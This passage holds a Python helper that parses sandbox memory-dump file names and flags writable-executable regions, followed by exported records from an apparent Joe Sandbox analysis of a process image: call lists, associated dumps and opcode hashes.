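def parse_sdmp(name: str) -> Dump:
    """Split one dump identifier into its fields; raises on an unexpected shape."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    f1, f2, f3, base, prot, f6, mtype, f8 = m.groups()
    return Dump(int(f1), int(f2), f3, int(base, 16), int(prot, 16),
                int(f6, 16), int(mtype, 16), int(f8, 16))


def protection_name(protect: int) -> str:
    """Symbolic PAGE_* name, with any guard/cache modifier bits appended."""
    names = [PAGE_BASE.get(protect & 0xFF, f"0x{protect & 0xFF:02x}")]
    names += [n for bit, n in PAGE_MODIFIER.items() if protect & bit]
    return "|".join(names)


def mem_type_name(mem_type: int) -> str:
    return MEM_TYPE.get(mem_type, f"0x{mem_type:x}")


def is_writable_executable(d: Dump) -> bool:
    """True for PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY regions."""
    low = d.protect & 0xFF
    return low in EXECUTABLE and low in WRITABLE


def layout(names):
    """Dumps sorted by base address as (base, protection, region type) triples."""
    dumps = sorted((parse_sdmp(n) for n in names), key=lambda d: d.base)
    return [(d.base, protection_name(d.protect), mem_type_name(d.mem_type)) for d in dumps]


def rwx_regions(names):
    """Base addresses of regions that were writable and executable when dumped."""
    dumps = sorted((parse_sdmp(n) for n in names), key=lambda d: d.base)
    return [d.base for d in dumps if is_writable_executable(d)]


# Identifiers copied from the records in this report (process 6, image at 00E90000).
SAMPLE_DUMPS = [
    "00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp",
    "00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp",
]

if __name__ == "__main__":
    for base, prot, kind in layout(SAMPLE_DUMPS):
        print(f"{base:08X}  {prot:24s} {kind}")
    print("writable+executable:", [f"{b:08X}" for b in rwx_regions(SAMPLE_DUMPS)])
```

                                  On the thirteen identifiers above, only the 00E90000 (PAGE_READWRITE) and 00EF9000 (PAGE_WRITECOPY) regions are non-executable; the other eleven were writable and executable at dump time, consistent with an image whose section rights were changed after load. Any dump whose name does not fit the assumed shape raises rather than being silently misread.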

                                  Control-flow Graph
                                  (rendered graph not reproduced; the data recoverable from its text export is listed here)
                                  • Entry block e92ec0; basic blocks span e92ec0-e931dd (graph node ids 4584-4681)
                                  • Calls made from this function: eab6b8, eac6ac, eac26a, eac6d1, ead3e2, eabd0b, ead663, eacff1, eabd4c
                                  • The Executed / Not Executed colouring of the rendered graph does not survive as text
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: the same twelve dumps of the 00E90000 image (process 6) as listed in the record above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Mtx_unlock$Cnd_broadcast
                                  • String ID:
                                  • API String ID: 32384418-0
                                  • Opcode ID: 04b512564ecba2f9366627b8de7fbe223d3c307752dc66cb367a960cef9ade1c
                                  • Instruction ID: aac3189be78ddf4b120490e20fbb246393794c00a66d73edad4d05f078f66442
                                  • Opcode Fuzzy Hash: 04b512564ecba2f9366627b8de7fbe223d3c307752dc66cb367a960cef9ade1c
                                  • Instruction Fuzzy Hash: D1A1BFB0A01605AFDF20DB75C9447AAB7E8FF19318F14A169E815FB251EB31EA04CB91

                                  Control-flow Graph
                                  (rendered graph not reproduced; the data recoverable from its text export is listed here)
                                  • Entry block eccbdf; basic blocks span eccbdf-eccef7 (graph node ids 4682-4773)
                                  • Calls made from this function: ec690a, ec75f6, ec6c5a, eccef8, ed8570, ec40f0, ed8480, ed82e0
                                  • The Executed / Not Executed colouring of the rendered graph does not survive as text
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                  • Instruction ID: cdab727d4dbd46ce02e933438bdc7c6d99c8c6f31a9248edf2bcb3428cecce1c
                                  • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                  • Instruction Fuzzy Hash: A0B101329002459FDB158F28CA81FBEBBE5EF46344F2451AEE859FB241D6368D03CB60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                  • String ID:
                                  • API String ID: 531285432-0
                                  • Opcode ID: 07cc57868f07faaa696404fc964ed6b8fbde687e6ab5772d50c5dbdf029ac08a
                                  • Instruction ID: 3f005f0bc1a03725a0b0e0e055a572780ae561d902dcd1620fd64633f3a8cb6e
                                  • Opcode Fuzzy Hash: 07cc57868f07faaa696404fc964ed6b8fbde687e6ab5772d50c5dbdf029ac08a
                                  • Instruction Fuzzy Hash: DE211D75A00119AFDF00EBA4DC819BEB7F9EF4D714F111055F601BB261DB70AD419BA0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00E9E4F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000006.00000002.2957729682.0000000000E90000.00000004.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957757618.0000000000EF2000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957850157.0000000000EF9000.00000008.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000000EFB000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001155000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.0000000001184000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000118E000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2957881919.000000000119B000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958387680.000000000119C000.00000080.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958567834.0000000001331000.00000040.00000001.01000000.00000007.sdmp
                                  • Associated: 00000006.00000002.2958596451.0000000001332000.00000080.00000001.01000000.00000007.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e90000_skotes.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: L1$invalid stoi argument
                                  • API String ID: 909987262-3568411768
                                  • Opcode ID: e47622dc11df26dc08c4fb2b401b7d31d338c02700c477bdfd8cbdd60cf871bd
                                  • Instruction ID: 78efd1e7ad4be9be7d0762b4f7ff169cdffeb7529a09254a6fb8e8f78475cd6e
                                  • Opcode Fuzzy Hash: e47622dc11df26dc08c4fb2b401b7d31d338c02700c477bdfd8cbdd60cf871bd
                                  • Instruction Fuzzy Hash: 8FF06272501314AFD724AB69DD02A6733E8EB9A710F105825FA24B7352EB707904C6A3